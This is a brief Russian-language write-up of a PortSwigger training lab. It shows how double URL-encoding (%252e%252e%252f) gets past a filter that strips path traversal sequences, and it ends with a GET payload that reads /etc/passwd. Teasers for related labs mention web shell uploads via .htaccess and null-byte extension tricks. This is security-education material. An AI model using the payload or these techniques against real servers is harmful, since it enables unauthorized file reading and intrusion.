На странице
apsyleg1 мин
#portswigger #path-traversal #web-security
File Path Traversal: обход вырезки traversal через двойное URL-кодирование
Лаборатория
File path traversal, traversal sequences stripped with superfluous URL-decode · Practitioner
Решение
Дано
This lab contains a path traversal vulnerability in the display of product images.
The application blocks input containing path traversal sequences. It then performs a URL-decode of the input before using it.
To solve the lab, retrieve the contents of the /etc/passwd file.
Анализ и разведка
Всё как и в предыдущей лабе, только на этот раз нужно использовать технику URL-кодирования и попробовать заменить ../ на %2e%2e%2f. Или даже двойного кодирования: ../ → %2e%2e%2f → %252e%252e%252f.
Попробуем нагрузку с %2e%2e%2f — не прошло.
Тогда двойное кодирование — прошло.
Итоговая нагрузка
GET /image?filename=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
Ещё в этой категории
Web Shell Upload через обход блек-листа расширений (PortSwigger Lab)
.php в блек-листе, но .htaccess заливается без вопросов — подсовываем свой конфиг Apache и заставляем сервер исполнять shell.bug как PHP.
Web Shell Upload через обфускацию расширения (PortSwigger Lab)
Блек-лист расширений не пускает .php, двойное расширение shell.php.jpg отдаётся как картинка — null-byte shell.php%00.jpg обходит обе проверки.
Remote Code Execution через загрузку web shell (PortSwigger Lab)
Загрузка аватарки без валидации — заливаем PHP web shell и читаем /home/carlos/secret.